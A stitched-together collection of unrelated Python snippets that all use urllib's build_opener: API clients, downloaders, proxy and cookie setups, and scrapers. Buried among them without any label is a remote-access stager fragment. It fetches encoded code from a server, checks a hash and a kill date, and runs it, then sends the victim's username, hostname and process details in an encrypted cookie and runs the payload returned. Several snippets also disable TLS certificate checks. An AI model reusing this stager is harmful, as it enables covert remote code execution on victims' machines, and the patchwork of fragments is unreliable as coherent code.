def run_query(search_terms): bing_api_key = read_bing_key() if not bing_api_key: raise KeyError('Bing Key Not Found') # Specify the base url and the service (Bing Search API 2.0) root_url = 'https://api.datamarket.azure.com/Bing/Search/' service = 'Web' # Specify how many results we wish to be returned per page. # Offset specifies where in the results list to start from. # With results_per_page = 10 and offset = 11, this would start from page 2. results_per_page = 10 offset = 0 # Wrap quotes around our query terms as required by the Bing API. # The query we will then use is stored within variable query. query = "'{0}'".format(search_terms) # Turn the query into an HTML encoded string. # We use urllib for this - differences exist between Python 2 and 3. # The try/except blocks are used to determine which function call works. # Replace this try/except block with the relevant import and query # assignment. try: from urllib import parse # Python 3 import. query = parse.quote(query) except ImportError: # If the import above fails, you are running Py 2.7.x. from urllib import quote query = quote(query) # Construct the latter part of our request's URL. # Sets the format of the response to JSON and sets other properties. search_url = "{0}{1}?$format=json&$top={2}&$skip={3}&Query={4}".format( root_url, service, results_per_page, offset, query) # Setup authentication with the Bing servers. # The username MUST be a blank string, and put in your API key! username = '' # headers = {'Authorization' : 'Basic {0}'.format(b64encode(bing_api_key))} # Create a 'password manager' which handles authentication for us. try: from urllib import request # Python 3 import. password_mgr = request.HTTPPasswordMgrWithDefaultRealm() except ImportError: # Running Python 2.7.x - import urllib2 instead. import urllib2 password_mgr = urllib2.HTTPPasswordMgrWithDefaultRealm() password_mgr.add_password(None, search_url, username, bing_api_key) # Create our results list which we'll populate. results = [] try: # Prepare for connecting to Bing's servers. try: # Python 3.5 and 3.6 handler = request.HTTPBasicAuthHandler(password_mgr) opener = request.build_opener(handler) request.install_opener(opener) except UnboundLocalError: # Python 2.7.x handler = urllib2.HTTPBasicAuthHandler(password_mgr) opener = urllib2.build_opener(handler) urllib2.install_opener(opener) # Connect to the server and read the response generated. try: # Python 3.5 or 3.6 response = request.urlopen(search_url).read() response = response.decode('utf-8') except UnboundLocalError: # Python 2.7.x response = urllib2.urlopen(search_url).read() # Convert the string response to a Python dictionary object. json_response = json.loads(response) # Loop through each page returned, populating out results list. for result in json_response['d']['results']: results.append({ 'title': result['Title'], 'link': result['Url'], 'summary': result['Description'] }) except: print("Error when querying the Bing API") # Return the list of results to the calling function. return results
from urllib.request import HTTPPasswordMgrWithDefaultRealm, HTTPBasicAuthHandler, build_opener from urllib.error import URLError username = '******' pasword = 'password' url = 'http://localhost:5000/' p = HTTPPasswordMgrWithDefaultRealm() p.add_password(None, url, username, pasword) auth_handler = HTTPBasicAuthHandler(p) opener = build_opener(auth_handler) try: result = opener.open(url) html = result.read().decode('utf-8') print(html) except URLError as e: print(e.reason)
cstr=time.strftime("%Y-%m-%d",time.gmtime());cstr=time.strptime(cstr,"%Y-%m-%d") # This doesn't exist in python < 2.7.9 if sys.version_info[0] == 3 or (sys.version_info[0] == 2 and sys.version_info[1] >= 7 and sys.version_info[2] >= 9): ssl._create_default_https_context=ssl._create_unverified_context if hh[0]: r=urllib2.Request(url,headers={'Host':hh[0],'User-agent':ua}) else: r=urllib2.Request(url,headers={'User-agent':ua}) res=urllib2.urlopen(r);d=res.read(); try:b=bytes.fromhex(d[1:].decode("utf-8")).decode("utf-8");s=hashlib.sha512(b.encode("utf-8")).hexdigest() except:c=d[1:];b=c.decode("hex");s=hashlib.sha512(b).hexdigest() if pykey in b and pyhash == s and cstr < kdn: try:exec(bytes.fromhex(d[1:].decode("utf-8")).decode("utf-8")) except:exec(b) else: sys.exit(0) un=pwd.getpwuid(os.getuid())[ 0 ];pid=os.getpid();pname="NA" is64=sys.maxsize > 2**32;arch=('x64' if is64 == True else 'x86') hn=socket.gethostname();o=urllib2.build_opener() encsid=encrypt(key, '%s;%s;%s;%s;%s;%s;%s' % (un,hn,hn,arch,pid,pname,urlid)) if hh[0]: headers = ({'Host':hh[0],'User-Agent':ua,'Cookie':'SessionID=%s' % encsid.decode("utf-8")}) else: headers = ({'User-Agent':ua,'Cookie':'SessionID=%s' % encsid.decode("utf-8")}) request = urllib2.Request(url2, headers=headers);response = urllib2.urlopen(request); html = response.read().decode('utf-8');x=decrypt(key, html) exec(base64.b64decode(x)) un=pwd.getpwuid(os.getuid())[ 0 ];pid=os.getpid();procname="python" is64=sys.maxsize > 2**32;arch=('x64' if is64 == True else 'x86') hn=socket.gethostname();o=urllib2.build_opener() encsid=encrypt(key, '%s;%s;%s;%s;%s;%s;%s' % (un,hn,hn,arch,pid,procname,urlid)) if hh[0]:r=urllib2.Request(url2,headers={'Host':hh[0],'User-agent':ua,'Cookie':'SessionID=%s' % encsid}) else:r=urllib2.Request(url2,headers={'User-agent':ua,'Cookie':'SessionID=%s' % encsid}) res=urllib2.urlopen(r);html=res.read();x=decrypt(key, html).rstrip('\0'); exec(base64.b64decode(x))
def opener(self): if DEBUG: return urllib.build_opener(urllib.HTTPSHandler(debuglevel=1)) else: return urllib.build_opener()
def build_openner(): cookie = CookieJar() cookie_handler = ur.HTTPCookieProcessor(cookie) opener = ur.build_opener(cookie_handler) return opener
# Download link LavFilters = "https://github.com/Nevcairiel/LAVFilters/releases/download/0.74.1/LAVFilters-0.74.1-Installer.exe" # 64 Bits if platform.machine().endswith('64'): FFMPEG = "https://ffmpeg.zeranoe.com/builds/win64/static/ffmpeg-20190502-7eba264-win64-static.zip" # 32 Bits else: FFMPEG = "https://ffmpeg.zeranoe.com/builds/win32/static/ffmpeg-20190502-7eba264-win32-static.zip" DemGlobal = "http://www.gisandbeers.com/RRSS/Cartografia/ETOPO1.zip" progress = QProgressBar() progress.setAlignment(Qt.AlignLeft | Qt.AlignVCenter) opener = build_opener() opener.addheaders = [( 'User-Agent', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1941.0 Safari/537.36' )] install_opener(opener) def reporthook(blocknum, blocksize, totalsize): ''' Url retrieve progress ''' readsofar = blocknum * blocksize if totalsize > 0: percent = readsofar * 1e2 / totalsize progress.setValue(int(percent))
from urllib.error import URLError from urllib.request import ProxyHandler, build_opener proxy_handler = ProxyHandler({ 'http': 'http://127.0.0.1:9743', 'https': 'https://127.0.0.1:9743' }) opener = build_opener(proxy_handler) try: response = opener.open('https://www.baidu.com') print(response.read().decode('utf-8')) except URLError as e: print(e.reason)
def get_modisfiles(username, password, platform, product, year, tile, proxy, doy_start=1, doy_end=-1, base_url="https://e4ftl01.cr.usgs.gov", out_dir=".", ruff=False, get_xml=False, verbose=False): """Download MODIS products for a given tile, year & period of interest This function uses the `urllib2` module to download MODIS "granules" from the USGS website. The approach is based on downloading the index files for any date of interest, and parsing the HTML (rudimentary parsing!) to search for the relevant filename for the tile the user is interested in. This file is then downloaded in the directory specified by `out_dir`. The function also checks to see if the selected remote file exists locally. If it does, it checks that the remote and local file sizes are identical. If they are, file isn't downloaded, but if they are different, the remote file is downloaded. Parameters ---------- username: str The EarthData username string password: str The EarthData username string platform: str One of three: MOLA, MOLT MOTA product: str The product name, such as MOD09GA.005 or MYD15A2.005. Note that you need to specify the collection number (005 in the examples) year: int The year of interest tile: str The tile (e.g., "h17v04") proxy: dict A proxy definition, such as {'http': 'http://127.0.0.1:8080', \ 'ftp': ''}, etc. doy_start: int The starting day of the year. doy_end: int The ending day of the year. base_url: str, url The URL to use. Shouldn't be changed, unless USGS change the server. out_dir: str The output directory. Will be create if it doesn't exist ruff: Boolean Check to see what files are already available and download them without testing for file size etc. verbose: Boolean Whether to sprout lots of text out or not. get_xml: Boolean Whether to get the XML metadata files or not. Someone uses them, apparently ;-) Returns ------- Nothing """ if proxy is not None: proxy = urllib2.ProxyHandler(proxy) opener = urllib2.build_opener(proxy) urllib2.install_opener(opener) if not os.path.exists(out_dir): if verbose: logger.info("Creating output dir %s" % out_dir) os.makedirs(out_dir) if doy_end == -1: if calendar.isleap(year): doy_end = 367 else: doy_end = 366 dates = [ time.strftime("%Y.%m.%d", time.strptime("%d/%d" % (i, year), "%j/%Y")) for i in range(doy_start, doy_end) ] url = "%s/%s/%s/" % (base_url, platform, product) dates = parse_modis_dates(url, dates, product, out_dir, ruff=ruff) # Only use the latests date from range if len(dates) > 1: dates = [dates[-1]] them_urls = [] res = [] for date in dates: r = requests.get("%s%s" % (url, date), verify=False) for line in r.text.split("\n"): if line.find(tile) >= 0: if line.find(".hdf") >= 0: fname = line.split("href=")[1].split(">")[0].strip('"') if fname.endswith(".hdf.xml") and not get_xml: pass else: fpath = os.path.join(out_dir, fname) res.append(fpath) if not os.path.exists(fpath): them_urls.append("%s/%s/%s" % (url, date, fname)) else: if verbose: logger.info( "File %s already present. Skipping" % fname) with requests.Session() as s: s.auth = (username, password) for the_url in them_urls: r1 = s.request('get', the_url) r = s.get(r1.url, stream=True) if not r.ok: raise IOError("Can't start download... [%s]" % the_url) file_size = int(r.headers['content-length']) fname = the_url.split("/")[-1] fpath = os.path.join(out_dir, fname) logger.info("Starting download on %s(%d bytes) ..." % (fpath, file_size)) with open(fpath, 'wb') as fp: for chunk in r.iter_content(chunk_size=CHUNKS): if chunk: fp.write(chunk) fp.flush() os.fsync(fp) if verbose: logger.info("\tDone!") if verbose: logger.info("Completely finished downlading all there was") return res
def all_games_account(): #API Model api_return = { 'QueryStatus': { 'error': False, 'error_message': '' }, 'Account': { 'user_64id': '0', 'user_persona': 'test_user', 'user_realname': 'Test User', 'user_country': 'XX', 'user_state': 'XX', 'user_cityid': 'XX', 'user_primary_group': '', 'user_avatar_small': '', 'user_avatar_medium': '', 'user_avatar_large': '', 'user_account_link': '', 'account_public': '', 'account_creation_datetime': '', 'current_status': '', 'current_app_id': '', 'current_app_title': '', 'last_logoff_datetime': '', 'UserApps': { 'app_count': '', 'Apps': [] } } } # Get account's gamelist user_games_page = json.load(urllib2.build_opener().open( urllib2.Request( 'http://api.steampowered.com/ISteamApps/GetAppList/v2/'))) for x in user_games_page['response']['games']: app_data = get_app_data(x['appid']) if app_data['missing'] == True: app_data = { 'missing': True, 'app_id': str(x['appid']), 'minutes_played': x['playtime_forever'] } app_data['hours_played'] = math.ceil( (float(app_data['minutes_played']) / 60) * 100.0) / 100.0 else: app_data['genres'] = get_app_genres(x['appid']) app_data['developers'] = get_app_developers(x['appid']) app_data['publishers'] = get_app_publishers(x['appid']) app_data['languages'] = get_app_languages(x['appid']) if app_data['size_mb'] > 0: app_data['size_gb'] = math.ceil( (float(app_data['size_mb']) / 1000) * 10.0) / 10.0 else: app_data['size_mb'] = 0 app_data['size_gb'] = 0 app_data['minutes_played'] = 42 app_data['hours_played'] = math.ceil( (float(app_data['minutes_played']) / 60) * 100.0) / 100.0 # Figure out price/hours ratio if app_data['hours_played'] >= 1 and app_data[ 'store_price_default_usd'] is not None: app_data['price_hours'] = math.ceil( float(app_data['store_price_default_usd'] / app_data['hours_played']) * 100.0) / 100.0 else: app_data['price_hours'] = '' api_return['Account']['UserApps']['Apps'].append(app_data) api_return['Account']['UserApps']['app_count'] = len( api_return['Account']['UserApps']['Apps']) return api_return
from urllib import request, parse from http import cookiejar # 创建cookiejar的实例 cookie = cookiejar.CookieJar() # 生成 cookie的管理器 cookie_handler = request.HTTPCookieProcessor(cookie) # 创建http请求管理器 http_handler = request.HTTPHandler() # 生成https管理器 https_handler = request.HTTPSHandler() # 创建请求管理器 opener = request.build_opener(http_handler, https_handler, cookie_handler) def login(): ''' 负责初次登录 需要输入用户名密码,用来获取登录cookie凭证 :return: ''' # 此url需要从登录form的action属性中提取 url = "http://www.renren.com/PLogin.do" # 此键值需要从登录form的两个对应input中提取name属性 data = {"email": "13119144223", "password": "******"}
def get_opener(self): cookiejar=CookieJar() handler=request.HTTPCookieProcessor(cookiejar) opener=request.build_opener(handler) return opener
MODULE_PATH = os.path.dirname(os.path.abspath(__file__)) MODULE_NAME = os.path.join(MODULE_PATH, '_data.py') MODULE_ETAG = os.path.join(MODULE_PATH, '_data.etag') # Maximum file age to accept without checking for a newer version MAX_AGE_SEC = 86400 # Get the current file age and entity tag (if it exists) age = 1e6 etag = '' if os.path.exists(MODULE_NAME): age = time.time() - os.path.getmtime(MODULE_NAME) if os.path.exists(MODULE_ETAG): with open(MODULE_ETAG, 'r') as fh: etag = fh.read() # If the file is more than MAX_AGE_SEC old, check for an update if age > MAX_AGE_SEC: request = urlrequest.Request(MODULE_URL) opener = urlrequest.build_opener() data = opener.open(request) if data.headers['etag'] != etag: with open(MODULE_NAME, 'wb') as fh: fh.write(data.read()) with open(MODULE_ETAG, 'w') as fh: fh.write(data.headers['etag']) # Load in everything from the module from _data import * from _data import __all__
def __init__(self): """Initialize Token Resolver class""" self._proxies = get_proxies() install_opener(build_opener(ProxyHandler(self._proxies)))
def __init__( self, url ): self.opener = req.build_opener( req.HTTPCookieProcessor() ) self.open( url )
import xml.sax.saxutils as _saxutils import feedparser as _feedparser import html2text as _html2text from . import __url__ from . import __version__ from . import LOG as _LOG from . import config as _config from . import email as _email from . import error as _error from . import util as _util _USER_AGENT = 'rss2email/{} ({})'.format(__version__, __url__) _feedparser.USER_AGENT = _USER_AGENT _urllib_request.install_opener(_urllib_request.build_opener()) _SOCKET_ERRORS = [] for e in ['error', 'herror', 'gaierror']: if hasattr(_socket, e): _SOCKET_ERRORS.append(getattr(_socket, e)) del e # cleanup namespace _SOCKET_ERRORS = tuple(_SOCKET_ERRORS) # drv_libxml2 raises: # TypeError: 'str' does not support the buffer interface _feedparser.PREFERRED_XML_PARSERS = [] class Feed(object): """Utility class for feed manipulation and storage.
def __init__(self, address, timeout=5, proxy_opener=None, allow_permutations=False): # IPv4Address or IPv6Address if isinstance(address, IPv4Address) or isinstance( address, IPv6Address): self.address = address else: # Use ipaddress package exception handling. self.address = ip_address(address) # Default timeout for socket connections. self.timeout = timeout # Allow other than DNS lookups for ASNs. self.allow_permutations = allow_permutations if self.allow_permutations: from warnings import warn warn('allow_permutations has been deprecated and will be removed. ' 'It is no longer needed, due to the deprecation of asn_alts, ' 'and the addition of the asn_methods argument.') self.dns_resolver = dns.resolver.Resolver() self.dns_resolver.timeout = timeout self.dns_resolver.lifetime = timeout # Proxy opener. if isinstance(proxy_opener, OpenerDirector): self.opener = proxy_opener else: handler = ProxyHandler() self.opener = build_opener(handler) # IP address in string format for use in queries. self.address_str = self.address.__str__() # Determine the IP version, 4 or 6 self.version = self.address.version if self.version == 4: # Check if no ASN/whois resolution needs to occur. is_defined = ipv4_is_defined(self.address_str) if is_defined[0]: raise IPDefinedError( 'IPv4 address {0} is already defined as {1} via ' '{2}.'.format(self.address_str, is_defined[1], is_defined[2])) # Reverse the IPv4Address for the DNS ASN query. split = self.address_str.split('.') split.reverse() self.reversed = '.'.join(split) self.dns_zone = IPV4_DNS_ZONE.format(self.reversed) else: # Check if no ASN/whois resolution needs to occur. is_defined = ipv6_is_defined(self.address_str) if is_defined[0]: raise IPDefinedError( 'IPv6 address {0} is already defined as {1} via ' '{2}.'.format(self.address_str, is_defined[1], is_defined[2])) # Explode the IPv6Address to fill in any missing 0's. exploded = self.address.exploded # Cymru seems to timeout when the IPv6 address has trailing '0000' # groups. Remove these groups. groups = exploded.split(':') for index, value in reversed(list(enumerate(groups))): if value == '0000': del groups[index] else: break exploded = ':'.join(groups) # Reverse the IPv6Address for the DNS ASN query. val = str(exploded).replace(':', '') val = val[::-1] self.reversed = '.'.join(val) self.dns_zone = IPV6_DNS_ZONE.format(self.reversed)
if not path.exists(directory): makedirs(directory) name = directory + '/' + url.replace('/', '') + '.jpg' try: urlretrieve(url, name) except HTTPError: return 1 print('Images saved successfully.') return 0 def load_proxies(input_file): with open(input_file, "r") as Fi: proxies = set(Fi.readlines()) return proxies if __name__ == '__main__': url_first = '1' counter = 1 # set_proxies = load_proxies(input_file='proxies_good.txt') proxy = ProxyHandler({'http': '167.249.248.122:33865'}) opener = build_opener(proxy) install_opener(opener) while True: url_now = url_first.replace('/1.jpg', '/' + str(counter) + '.jpg') if img_saver(url_first) == 1: break sleep(3) counter += 1
url = "http://www.qishu.cc/kehuan/list6_%s.html" url = "http://www.qishu.cc/chuanyeu/list7_%s.html" url = "http://www.qishu.cc/wangyou/list8_%s.html" url = "http://www.qishu.cc/lishi/list9_%s.html" url = "http://www.qishu.cc/xiaoyuan/list5_%s.html" url = "http://www.qishu.cc/yanqing/list10_%s.html" url = "http://www.qishu.cc/wenxue/list11_%s.html" user_agent = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) ' \ 'Chrome/64.0.3282.119 Safari/537.36 ' head = {'User-Agnet': user_agent, 'Connection': 'keep-alive'} data = {'a': '1'} postData = parse.urlencode(data).encode('utf-8') cookie = cookiejar.CookieJar() cookie_support = request.HTTPCookieProcessor(cookie) opener = request.build_opener(cookie_support) for i in range(1, 13): page = url % i f.writelines("--- %s" % page) print(page) f.write("\n") req1 = request.Request(url=page, data=postData, headers=head, method='GET') response1 = opener.open(req1) html = response1.read() # print(html) html = html.decode('GB18030') get_names(html) f.flush()
req.full_url, 404, str(reason), message_from_string('content-type: text/plain'), BytesIO()) elif isinstance(reason, IsADirectoryError): # Emulate the way a web server handles directories. if path.endswith('/'): req.full_url = f'file://{path}index.html' return self.file_open(req) # Redirect to add trailing slash. raise HTTPError( req.full_url + '/', 301, 'Path is a directory', message_from_string('content-type: text/plain'), BytesIO()) else: raise _URL_OPENER = build_opener(_CustomRedirectHandler, _CustomFileHandler) def open_page(url: str, ignore_client_error: bool = False, accept_header: str = '*/*') -> addinfourl: """Open a connection to retrieve a resource via HTTP GET. @param url: The URL of the resource to request. @param ignore_client_error: If C{True}, a client error (HTTP status 400) is not reported as an error. This is useful to avoid false positives when making speculative requests. @param accept_header: HTTP C{Accept} header to use for the request.
#!/usr/bin/env python #coding=utf-8 import urllib.request as urllib2 # this is a neat trick to import urllib2 under python3 import simplejson data = simplejson.dumps({ 'text': '''Some long text here...''', 'language': 'english', 'passphrase': '...passphrase...', 'simple_maths_n': 10, 'attribute': 'word', 'exclude_stop_words': True, 'alphanumeric': True, 'one_alphabetic': True, 'min_length': 3, 'max_keywords': 10, 'min_frequency': 5 }) req = urllib2.Request("https://beta.sketchengine.co.uk/get_keywords/", data) opener = urllib2.build_opener() f = opener.open(req) obj = simplejson.load(f) if obj.get('error') == '': print('Length:', obj.get('length', 0)) print('Reference corpus:', obj.get('ref_corp', '')) for k in obj.get('keywords', []): print('%s\t%d\t%f' % tuple(k)) else: print('Error encountered:', obj.get('error'))
第一次 post 获取cookie,后面都会携带此 cookie 后面就可以使用此 cookie 访问其他网页 """ from urllib import request, parse from http import cookiejar # cookie cookie = cookiejar.CookieJar() # handler cookie_handler = request.HTTPCookieProcessor(cookiejar=cookie) opener = request.build_opener(cookie_handler) opener.addheaders = [( "User-Agent", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.67 Safari/537.36" )] data = { "email": "", "password": "", } data_encode = parse.urlencode(data) url = "http://www.renren.com/PLogin.do" req = request.Request(url, data=str.encode(data_encode))
def send(i): """ Input: { action [str] - remote API action name config [dict] - configuration for remote server dict [dict] - dict to send to remote server ownership [dict] - info about user ownership } Output: { return [int] - return code = 0 if success or >0 if error (error) [str] - error string if return>0 } """ # Import modules compatible with Python 2.x and 3.x import urllib try: import urllib.request as urllib2 except: import urllib2 try: from urllib.parse import urlencode except: from urllib import urlencode # Get server and user config config = i.get('config', {}) username = config.get('username', '') # if username=='' or username==None: # return {'return':1, 'error':'Username is not defined'} api_key = config.get('api_key', '') # if api_key=='' or api_key==None: # return {'return':1, 'error': 'API key is not defined'} url = config.get('server_url') if url == '' or url == None: return {'return': 1, 'error': 'cK API URL is not defined'} remote_server_user = config.get('server_user') if remote_server_user == None: remote_server_user = '' remote_server_password = config.get('server_pass') if remote_server_password == None: remote_server_password = '' remote_skip_certificate_validation = config.get('server_skip_validation') if remote_skip_certificate_validation == None: remote_skip_certificate_validation = '' # Prepare dict to send to remote server ii = {} ii['action'] = i.get('action', '') ii['dict'] = i.get('dict', {}) ii['ownership'] = i.get('ownership', {}) ii['username'] = username ii['api_key'] = api_key # Prepare post variables r = ck.dumps_json({'dict': ii, 'skip_indent': 'yes'}) if r['return'] > 0: return r s = r['string'] if sys.version_info[0] > 2: s = s.encode('utf8') # Check if skip SSL certificate ctx = None add_ctx = False if remote_skip_certificate_validation == 'yes': import ssl ctx = ssl.create_default_context() ctx.check_hostname = False ctx.verify_mode = ssl.CERT_NONE add_ctx = True # If auth auth = None add_auth = False if remote_server_user != '' and remote_server_user != None: if remote_server_password == None: remote_server_password = '' auth = urllib2.HTTPPasswordMgrWithDefaultRealm() auth.add_password(None, url, remote_server_user, remote_server_password) add_auth = True # Prepare handler (TBD: maybe there is another, more elegant way?) if add_auth and add_ctx: urllib2.install_opener( urllib2.build_opener(urllib2.HTTPBasicAuthHandler(auth), urllib2.HTTPSHandler(context=ctx))) elif add_auth: urllib2.install_opener( urllib2.build_opener(urllib2.HTTPBasicAuthHandler(auth))) elif add_ctx: urllib2.install_opener( urllib2.build_opener(urllib2.HTTPSHandler(context=ctx))) # Prepare request request = urllib2.Request(url, s, {'Content-Type': 'application/json'}) # Connect try: f = urllib2.urlopen(request) except Exception as e: return { 'return': 1, 'error': 'Access to the cK portal failed (' + format(e) + ')' } # Read from Internet try: s = f.read() f.close() except Exception as e: return { 'return': 1, 'error': 'Failed reading stream from the cK portal (' + format(e) + ')' } # Check output try: s = s.decode('utf8') except Exception as e: pass # Try to convert output to dictionary r = ck.convert_json_str_to_dict({ 'str': s, 'skip_quote_replacement': 'yes' }) if r['return'] > 0: return { 'return': 1, 'error': 'can\'t parse output from the cK portal (' + r['error'] + '):\n' + s[:256] + '\n\n...)' } d = r['dict'] if 'return' in d: d['return'] = int( d['return'] ) # Fix for some strange behavior when 'return' is not integer - should check why ... else: d['return'] = 99 d['error'] = 'repsonse doesn\'t follow the cK standard' return d
# 代码展示了如何执行一个 HEAD 请求: from http.client import HTTPConnection from urllib import parse c = HTTPConnection('www.python.org', 80) c.request('HEAD', '/index.html') resp = c.getresponse() print('Status', resp.status) for name, value in resp.getheaders(): print(name, value) # 同样地,如果必须编写涉及代理、认证、 cookies 以及其他一些细节方面的代码, # 那么使用 urllib 就显得特别别扭和啰嗦。比方说,下面这个示例实现在 Python 包索 # 引上的认证: auth = request.HTTPBasicAuthHandler() auth.add_password('pypi', 'http://pypi.python.org', 'username', 'password') opener = request.build_opener(auth) r = request.Request('http://pypi.python.org/pypi?:action=login') u = opener.open(r) resp = u.read() # From here. You can access more pages using opener # 坦白说,所有的这些操作在 requests 库中都变得简单的多。 # 在开发过程中测试 HTTP 客户端代码常常是很令人沮丧的,因为所有棘手的细节 # 问题都需要考虑(例如 cookies、认证、 HTTP 头、编码方式等)。要完成这些任务, # 考虑使用 httpbin 服务(http://httpbin.org)。这个站点会接收发出的请求,然后以 # JSON 的形式将相应信息回传回来。下面是一个交互式的例子: # >>> import requests # >>> r = requests.get('http://httpbin.org/get?name=Dave&n=37', # ... headers = { 'User-agent': 'goaway/1.0' }) # >>> resp = r.json # >>> resp['headers'] # {'User-Agent': 'goaway/1.0', 'Content-Length': '', 'Content-Type': '',
#! /usr/bin/python3 # -*- coding:UTF-8 -*- from urllib import request proxy_support = request.ProxyHandler({'http': 'http://xx.xx.xx.xx:xx'}) opener = request.build_opener(proxy_support, request.HTTPHandler) request.install_opener(opener) content = request.urlopen('https://movie.douban.com/').read().decode('utf-8') print(content)
# -*- coding: gbk -*- # -*- coding: UTF-8 -*- from urllib import request if __name__ == "__main__": #访问网址 url = 'https://ifconfig.me/ip' #这是代理IP proxy = {'https':'175.42.123.205:9999'} #创建ProxyHandler proxy_support = request.ProxyHandler(proxy) #创建Opener opener = request.build_opener(proxy_support) #添加User Angent opener.addheaders = [('User-Agent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36')] #安装OPener request.install_opener(opener) #使用自己安装好的Opener response = request.urlopen(url) #读取相应信息并解码 html = response.read().decode("utf-8") #打印信息 print(html)
def install_proxy(proxy_handler: Dict[str, str]) -> None: proxy_support = request.ProxyHandler(proxy_handler) opener = request.build_opener(proxy_support) request.install_opener(opener)